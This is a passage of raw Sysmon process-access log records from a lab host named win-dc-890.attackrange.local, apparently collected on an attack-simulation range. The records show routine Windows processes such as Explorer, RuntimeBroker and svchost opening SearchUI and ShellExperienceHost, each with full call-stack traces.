ll+60c3f|C:\Windows\System32\combase.dll+7c419|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d 10341000x80000000000000001053729Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 08:05:34.560{466BC892-32D3-60E8-6F0B-00000000CF01}70767684C:\Windows\System32\RuntimeBroker.exe{466BC892-81EC-60E9-8133-00000000CF01}9348C:\Windows\SystemApps\Microsoft.Windows.Cortana_cw5n1h2txyewy\SearchUI.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6cc4|C:\Windows\System32\RPCRT4.dll+67d2f|C:\Windows\System32\combase.dll+620bb|C:\Windows\system32\windows.cortana.onecore.dll+1a8c3|C:\Windows\system32\windows.cortana.onecore.dll+6198|C:\Windows\system32\windows.cortana.onecore.dll+16cb1|C:\Windows\system32\windows.cortana.onecore.dll+1537|C:\Windows\system32\windows.cortana.onecore.dll+4a2d|C:\Windows\System32\combase.dll+aeb5a|C:\Windows\System32\combase.dll+a592d|C:\Windows\System32\RuntimeBroker.exe+12d1|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+618a9|C:\Windows\System32\combase.dll+27cf|C:\Windows\System32\combase.dll+65213|C:\Windows\System32\combase.dll+64ec2|C:\Windows\System32\combase.dll+63798|C:\Windows\System32\combase.dll+6155d|C:\Windows\System32\combase.dll+60c3f|C:\Windows\System32\combase.dll+7c419|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49cde 10341000x80000000000000001053728Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 
08:05:34.560{466BC892-32D3-60E8-770B-00000000CF01}63567232C:\Windows\Explorer.EXE{466BC892-81EC-60E9-8133-00000000CF01}9348C:\Windows\SystemApps\Microsoft.Windows.Cortana_cw5n1h2txyewy\SearchUI.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\SYSTEM32\twinapi.appcore.dll+1ea06|C:\Windows\SYSTEM32\twinapi.appcore.dll+1e3d1|C:\Windows\SYSTEM32\twinapi.appcore.dll+1dbcc|C:\Windows\SYSTEM32\twinapi.appcore.dll+1d777|C:\Windows\System32\TwinUI.dll+ba2b0|C:\Windows\System32\TwinUI.dll+ba627|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+618a9|C:\Windows\System32\combase.dll+27a9|C:\Windows\System32\RPCRT4.dll+62d9b|C:\Windows\System32\combase.dll+6520c|C:\Windows\System32\combase.dll+64ec2|C:\Windows\System32\combase.dll+63798|C:\Windows\System32\combase.dll+61c3f|C:\Windows\System32\combase.dll+60c3f|C:\Windows\System32\combase.dll+5e336|C:\Windows\System32\combase.dll+5daea|C:\Windows\System32\USER32.dll+121e4|C:\Windows\System32\USER32.dll+11b2c|C:\Windows\System32\windows.immersiveshell.serviceprovider.dll+5be0|C:\Windows\System32\windows.immersiveshell.serviceprovider.dll+635e 10341000x80000000000000001053727Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 
08:05:34.560{466BC892-32D3-60E8-770B-00000000CF01}63567232C:\Windows\Explorer.EXE{466BC892-81EC-60E9-8133-00000000CF01}9348C:\Windows\SystemApps\Microsoft.Windows.Cortana_cw5n1h2txyewy\SearchUI.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\SYSTEM32\twinapi.appcore.dll+1e95e|C:\Windows\SYSTEM32\twinapi.appcore.dll+1e3d1|C:\Windows\SYSTEM32\twinapi.appcore.dll+1dbcc|C:\Windows\SYSTEM32\twinapi.appcore.dll+1d777|C:\Windows\System32\TwinUI.dll+ba2b0|C:\Windows\System32\TwinUI.dll+ba627|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+618a9|C:\Windows\System32\combase.dll+27a9|C:\Windows\System32\RPCRT4.dll+62d9b|C:\Windows\System32\combase.dll+6520c|C:\Windows\System32\combase.dll+64ec2|C:\Windows\System32\combase.dll+63798|C:\Windows\System32\combase.dll+61c3f|C:\Windows\System32\combase.dll+60c3f|C:\Windows\System32\combase.dll+5e336|C:\Windows\System32\combase.dll+5daea|C:\Windows\System32\USER32.dll+121e4|C:\Windows\System32\USER32.dll+11b2c|C:\Windows\System32\windows.immersiveshell.serviceprovider.dll+5be0|C:\Windows\System32\windows.immersiveshell.serviceprovider.dll+635e 10341000x80000000000000001053726Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 
08:05:34.544{466BC892-32D3-60E8-770B-00000000CF01}63569904C:\Windows\Explorer.EXE{466BC892-81EC-60E9-8133-00000000CF01}9348C:\Windows\SystemApps\Microsoft.Windows.Cortana_cw5n1h2txyewy\SearchUI.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\System32\SHELL32.dll+61d9f|C:\Windows\System32\SHELL32.dll+62945|C:\Windows\Explorer.EXE+3c618|C:\Windows\Explorer.EXE+3c4a4|C:\Windows\Explorer.EXE+3c411|C:\Windows\System32\windows.storage.dll+7b7ef|C:\Windows\System32\windows.storage.dll+7a56f|C:\Windows\System32\windows.storage.dll+7d51f|C:\Windows\System32\SHCORE.dll+367a6|C:\Windows\SYSTEM32\ntdll.dll+39cf9|C:\Windows\SYSTEM32\ntdll.dll+1e88a|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x80000000000000001053725Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 08:05:34.544{466BC892-32D3-60E8-770B-00000000CF01}63569904C:\Windows\Explorer.EXE{466BC892-81EC-60E9-8133-00000000CF01}9348C:\Windows\SystemApps\Microsoft.Windows.Cortana_cw5n1h2txyewy\SearchUI.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\System32\SHELL32.dll+6285e|C:\Windows\Explorer.EXE+3c618|C:\Windows\Explorer.EXE+3c4a4|C:\Windows\Explorer.EXE+3c411|C:\Windows\System32\windows.storage.dll+7b7ef|C:\Windows\System32\windows.storage.dll+7a56f|C:\Windows\System32\windows.storage.dll+7d51f|C:\Windows\System32\SHCORE.dll+367a6|C:\Windows\SYSTEM32\ntdll.dll+39cf9|C:\Windows\SYSTEM32\ntdll.dll+1e88a|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x80000000000000001053724Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 
08:05:34.528{466BC892-32D3-60E8-770B-00000000CF01}63569904C:\Windows\Explorer.EXE{466BC892-81EC-60E9-8133-00000000CF01}9348C:\Windows\SystemApps\Microsoft.Windows.Cortana_cw5n1h2txyewy\SearchUI.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\System32\SHELL32.dll+61724|C:\Windows\System32\SHELL32.dll+62827|C:\Windows\Explorer.EXE+3c618|C:\Windows\Explorer.EXE+3c4a4|C:\Windows\Explorer.EXE+3c411|C:\Windows\System32\windows.storage.dll+7b7ef|C:\Windows\System32\windows.storage.dll+7a56f|C:\Windows\System32\windows.storage.dll+7d51f|C:\Windows\System32\SHCORE.dll+367a6|C:\Windows\SYSTEM32\ntdll.dll+39cf9|C:\Windows\SYSTEM32\ntdll.dll+1e88a|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x80000000000000001053723Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 08:05:34.528{466BC892-02AF-60E8-0D00-00000000CF01}9006000C:\Windows\system32\svchost.exe{466BC892-81EC-60E9-8133-00000000CF01}9348C:\Windows\SystemApps\Microsoft.Windows.Cortana_cw5n1h2txyewy\SearchUI.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+221bd|c:\windows\system32\rpcss.dll+f681|c:\windows\system32\rpcss.dll+d34e|c:\windows\system32\rpcss.dll+c38a|c:\windows\system32\rpcss.dll+d73e|c:\windows\system32\rpcss.dll+1514|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+22b4b|C:\Windows\System32\RPCRT4.dll+653fa|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x80000000000000001053722Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 
08:05:34.528{466BC892-02AF-60E8-0D00-00000000CF01}9006000C:\Windows\system32\svchost.exe{466BC892-81EC-60E9-8133-00000000CF01}9348C:\Windows\SystemApps\Microsoft.Windows.Cortana_cw5n1h2txyewy\SearchUI.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+221bd|c:\windows\system32\rpcss.dll+f681|c:\windows\system32\rpcss.dll+c264|c:\windows\system32\rpcss.dll+d73e|c:\windows\system32\rpcss.dll+1514|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+22b4b|C:\Windows\System32\RPCRT4.dll+653fa|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x80000000000000001053721Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 
08:05:34.528{466BC892-02AF-60E8-0D00-00000000CF01}9006000C:\Windows\system32\svchost.exe{466BC892-81EC-60E9-8133-00000000CF01}9348C:\Windows\SystemApps\Microsoft.Windows.Cortana_cw5n1h2txyewy\SearchUI.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+221bd|c:\windows\system32\rpcss.dll+f681|c:\windows\system32\rpcss.dll+d34e|c:\windows\system32\rpcss.dll+c38a|c:\windows\system32\rpcss.dll+d73e|c:\windows\system32\rpcss.dll+1514|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+22b4b|C:\Windows\System32\RPCRT4.dll+653fa|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x80000000000000001053720Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 
08:05:34.528{466BC892-02AF-60E8-0D00-00000000CF01}9006000C:\Windows\system32\svchost.exe{466BC892-81EC-60E9-8133-00000000CF01}9348C:\Windows\SystemApps\Microsoft.Windows.Cortana_cw5n1h2txyewy\SearchUI.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+221bd|c:\windows\system32\rpcss.dll+f681|c:\windows\system32\rpcss.dll+c264|c:\windows\system32\rpcss.dll+d73e|c:\windows\system32\rpcss.dll+1514|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+22b4b|C:\Windows\System32\RPCRT4.dll+653fa|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x80000000000000001053719Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 
08:05:34.528{466BC892-02AF-60E8-0D00-00000000CF01}9006000C:\Windows\system32\svchost.exe{466BC892-81EC-60E9-8133-00000000CF01}9348C:\Windows\SystemApps\Microsoft.Windows.Cortana_cw5n1h2txyewy\SearchUI.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+221bd|c:\windows\system32\rpcss.dll+f681|c:\windows\system32\rpcss.dll+d34e|c:\windows\system32\rpcss.dll+c38a|c:\windows\system32\rpcss.dll+d73e|c:\windows\system32\rpcss.dll+1514|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+22b4b|C:\Windows\System32\RPCRT4.dll+653fa|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x80000000000000001053718Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 
08:05:34.528{466BC892-02AF-60E8-0D00-00000000CF01}9006000C:\Windows\system32\svchost.exe{466BC892-81EC-60E9-8133-00000000CF01}9348C:\Windows\SystemApps\Microsoft.Windows.Cortana_cw5n1h2txyewy\SearchUI.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+221bd|c:\windows\system32\rpcss.dll+f681|c:\windows\system32\rpcss.dll+c264|c:\windows\system32\rpcss.dll+d73e|c:\windows\system32\rpcss.dll+1514|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+22b4b|C:\Windows\System32\RPCRT4.dll+653fa|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x80000000000000001053717Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 08:05:34.527{466BC892-02AF-60E8-0C00-00000000CF01}8449428C:\Windows\system32\svchost.exe{466BC892-81EC-60E9-8133-00000000CF01}9348C:\Windows\SystemApps\Microsoft.Windows.Cortana_cw5n1h2txyewy\SearchUI.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\SYSTEM32\psmserviceexthost.dll+78b1|C:\Windows\SYSTEM32\psmserviceexthost.dll+74d7|C:\Windows\SYSTEM32\psmserviceexthost.dll+1a384|C:\Windows\SYSTEM32\psmserviceexthost.dll+11055|C:\Windows\SYSTEM32\psmserviceexthost.dll+108cf|C:\Windows\SYSTEM32\ntdll.dll+2063e|C:\Windows\SYSTEM32\ntdll.dll+1e854|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x80000000000000001053716Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 
08:05:34.527{466BC892-02AF-60E8-0C00-00000000CF01}8449428C:\Windows\system32\svchost.exe{466BC892-0677-60E8-BC03-00000000CF01}5972C:\Windows\SystemApps\Microsoft.Windows.Cortana_cw5n1h2txyewy\SearchUI.exe0x3600C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\SYSTEM32\psmserviceexthost.dll+966a|C:\Windows\SYSTEM32\psmserviceexthost.dll+776e|C:\Windows\SYSTEM32\psmserviceexthost.dll+489d|C:\Windows\SYSTEM32\psmserviceexthost.dll+1a2ed|C:\Windows\SYSTEM32\psmserviceexthost.dll+11055|C:\Windows\SYSTEM32\psmserviceexthost.dll+108cf|C:\Windows\SYSTEM32\ntdll.dll+2063e|C:\Windows\SYSTEM32\ntdll.dll+1e854|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x80000000000000001053715Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 08:05:34.527{466BC892-02AF-60E8-0C00-00000000CF01}8449428C:\Windows\system32\svchost.exe{466BC892-0675-60E8-B703-00000000CF01}5772C:\Windows\SystemApps\ShellExperienceHost_cw5n1h2txyewy\ShellExperienceHost.exe0x3600C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\SYSTEM32\psmserviceexthost.dll+966a|C:\Windows\SYSTEM32\psmserviceexthost.dll+776e|C:\Windows\SYSTEM32\psmserviceexthost.dll+489d|C:\Windows\SYSTEM32\psmserviceexthost.dll+1a2ed|C:\Windows\SYSTEM32\psmserviceexthost.dll+11055|C:\Windows\SYSTEM32\psmserviceexthost.dll+108cf|C:\Windows\SYSTEM32\ntdll.dll+2063e|C:\Windows\SYSTEM32\ntdll.dll+1e854|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x80000000000000001053714Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 
08:05:34.527{466BC892-02AF-60E8-0C00-00000000CF01}8449428C:\Windows\system32\svchost.exe{466BC892-32D6-60E8-840B-00000000CF01}7376C:\Windows\SystemApps\ShellExperienceHost_cw5n1h2txyewy\ShellExperienceHost.exe0x3600C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\SYSTEM32\psmserviceexthost.dll+966a|C:\Windows\SYSTEM32\psmserviceexthost.dll+776e|C:\Windows\SYSTEM32\psmserviceexthost.dll+489d|C:\Windows\SYSTEM32\psmserviceexthost.dll+1a2ed|C:\Windows\SYSTEM32\psmserviceexthost.dll+11055|C:\Windows\SYSTEM32\psmserviceexthost.dll+108cf|C:\Windows\SYSTEM32\ntdll.dll+2063e|C:\Windows\SYSTEM32\ntdll.dll+1e854|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x80000000000000001053713Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 08:05:34.527{466BC892-02AF-60E8-0C00-00000000CF01}8449428C:\Windows\system32\svchost.exe{466BC892-81EC-60E9-8133-00000000CF01}9348C:\Windows\SystemApps\Microsoft.Windows.Cortana_cw5n1h2txyewy\SearchUI.exe0x3600C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\SYSTEM32\psmserviceexthost.dll+966a|C:\Windows\SYSTEM32\psmserviceexthost.dll+776e|C:\Windows\SYSTEM32\psmserviceexthost.dll+489d|C:\Windows\SYSTEM32\psmserviceexthost.dll+1a2ed|C:\Windows\SYSTEM32\psmserviceexthost.dll+11055|C:\Windows\SYSTEM32\psmserviceexthost.dll+108cf|C:\Windows\SYSTEM32\ntdll.dll+2063e|C:\Windows\SYSTEM32\ntdll.dll+1e854|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x80000000000000001053712Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 
08:05:34.526{466BC892-02AF-60E8-0C00-00000000CF01}84410200C:\Windows\system32\svchost.exe{466BC892-81EC-60E9-8133-00000000CF01}9348C:\Windows\SystemApps\Microsoft.Windows.Cortana_cw5n1h2txyewy\SearchUI.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\SYSTEM32\psmserviceexthost.dll+78b1|C:\Windows\SYSTEM32\psmserviceexthost.dll+74d7|C:\Windows\SYSTEM32\psmserviceexthost.dll+12fce|C:\Windows\SYSTEM32\psmserviceexthost.dll+15b2b|C:\Windows\SYSTEM32\psmserviceexthost.dll+1011d|C:\Windows\SYSTEM32\psmserviceexthost.dll+104a0|C:\Windows\SYSTEM32\psmserviceexthost.dll+13952|C:\Windows\SYSTEM32\psmserviceexthost.dll+16139|C:\Windows\SYSTEM32\psmserviceexthost.dll+16c03|C:\Windows\SYSTEM32\resourcepolicyserver.dll+1a70e|C:\Windows\SYSTEM32\resourcepolicyserver.dll+14fc2|C:\Windows\SYSTEM32\resourcepolicyserver.dll+c61d|C:\Windows\SYSTEM32\resourcepolicyserver.dll+118d9|C:\Windows\SYSTEM32\resourcepolicyserver.dll+b91a|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c 10341000x80000000000000001053711Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 
08:05:34.526{466BC892-02AF-60E8-0C00-00000000CF01}84410200C:\Windows\system32\svchost.exe{466BC892-0677-60E8-BC03-00000000CF01}5972C:\Windows\SystemApps\Microsoft.Windows.Cortana_cw5n1h2txyewy\SearchUI.exe0x3600C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\SYSTEM32\psmserviceexthost.dll+966a|C:\Windows\SYSTEM32\psmserviceexthost.dll+776e|C:\Windows\SYSTEM32\psmserviceexthost.dll+12f1c|C:\Windows\SYSTEM32\psmserviceexthost.dll+15b2b|C:\Windows\SYSTEM32\psmserviceexthost.dll+1011d|C:\Windows\SYSTEM32\psmserviceexthost.dll+104a0|C:\Windows\SYSTEM32\psmserviceexthost.dll+13952|C:\Windows\SYSTEM32\psmserviceexthost.dll+16139|C:\Windows\SYSTEM32\psmserviceexthost.dll+16c03|C:\Windows\SYSTEM32\resourcepolicyserver.dll+1a70e|C:\Windows\SYSTEM32\resourcepolicyserver.dll+14fc2|C:\Windows\SYSTEM32\resourcepolicyserver.dll+c61d|C:\Windows\SYSTEM32\resourcepolicyserver.dll+118d9|C:\Windows\SYSTEM32\resourcepolicyserver.dll+b91a|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c 10341000x80000000000000001053710Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 
08:05:34.526{466BC892-02AF-60E8-0C00-00000000CF01}84410200C:\Windows\system32\svchost.exe{466BC892-0675-60E8-B703-00000000CF01}5772C:\Windows\SystemApps\ShellExperienceHost_cw5n1h2txyewy\ShellExperienceHost.exe0x3600C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\SYSTEM32\psmserviceexthost.dll+966a|C:\Windows\SYSTEM32\psmserviceexthost.dll+776e|C:\Windows\SYSTEM32\psmserviceexthost.dll+12f1c|C:\Windows\SYSTEM32\psmserviceexthost.dll+15b2b|C:\Windows\SYSTEM32\psmserviceexthost.dll+1011d|C:\Windows\SYSTEM32\psmserviceexthost.dll+104a0|C:\Windows\SYSTEM32\psmserviceexthost.dll+13952|C:\Windows\SYSTEM32\psmserviceexthost.dll+16139|C:\Windows\SYSTEM32\psmserviceexthost.dll+16c03|C:\Windows\SYSTEM32\resourcepolicyserver.dll+1a70e|C:\Windows\SYSTEM32\resourcepolicyserver.dll+14fc2|C:\Windows\SYSTEM32\resourcepolicyserver.dll+c61d|C:\Windows\SYSTEM32\resourcepolicyserver.dll+118d9|C:\Windows\SYSTEM32\resourcepolicyserver.dll+b91a|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c 10341000x80000000000000001053709Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 
08:05:34.526{466BC892-02AF-60E8-0C00-00000000CF01}84410200C:\Windows\system32\svchost.exe{466BC892-32D6-60E8-840B-00000000CF01}7376C:\Windows\SystemApps\ShellExperienceHost_cw5n1h2txyewy\ShellExperienceHost.exe0x3600C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\SYSTEM32\psmserviceexthost.dll+966a|C:\Windows\SYSTEM32\psmserviceexthost.dll+776e|C:\Windows\SYSTEM32\psmserviceexthost.dll+12f1c|C:\Windows\SYSTEM32\psmserviceexthost.dll+15b2b|C:\Windows\SYSTEM32\psmserviceexthost.dll+1011d|C:\Windows\SYSTEM32\psmserviceexthost.dll+104a0|C:\Windows\SYSTEM32\psmserviceexthost.dll+13952|C:\Windows\SYSTEM32\psmserviceexthost.dll+16139|C:\Windows\SYSTEM32\psmserviceexthost.dll+16c03|C:\Windows\SYSTEM32\resourcepolicyserver.dll+1a70e|C:\Windows\SYSTEM32\resourcepolicyserver.dll+14fc2|C:\Windows\SYSTEM32\resourcepolicyserver.dll+c61d|C:\Windows\SYSTEM32\resourcepolicyserver.dll+118d9|C:\Windows\SYSTEM32\resourcepolicyserver.dll+b91a|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c 10341000x80000000000000001053708Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 
08:05:34.526{466BC892-02AF-60E8-0C00-00000000CF01}84410200C:\Windows\system32\svchost.exe{466BC892-81EC-60E9-8133-00000000CF01}9348C:\Windows\SystemApps\Microsoft.Windows.Cortana_cw5n1h2txyewy\SearchUI.exe0x3600C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\SYSTEM32\psmserviceexthost.dll+966a|C:\Windows\SYSTEM32\psmserviceexthost.dll+776e|C:\Windows\SYSTEM32\psmserviceexthost.dll+12f1c|C:\Windows\SYSTEM32\psmserviceexthost.dll+15b2b|C:\Windows\SYSTEM32\psmserviceexthost.dll+1011d|C:\Windows\SYSTEM32\psmserviceexthost.dll+104a0|C:\Windows\SYSTEM32\psmserviceexthost.dll+13952|C:\Windows\SYSTEM32\psmserviceexthost.dll+16139|C:\Windows\SYSTEM32\psmserviceexthost.dll+16c03|C:\Windows\SYSTEM32\resourcepolicyserver.dll+1a70e|C:\Windows\SYSTEM32\resourcepolicyserver.dll+14fc2|C:\Windows\SYSTEM32\resourcepolicyserver.dll+c61d|C:\Windows\SYSTEM32\resourcepolicyserver.dll+118d9|C:\Windows\SYSTEM32\resourcepolicyserver.dll+b91a|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.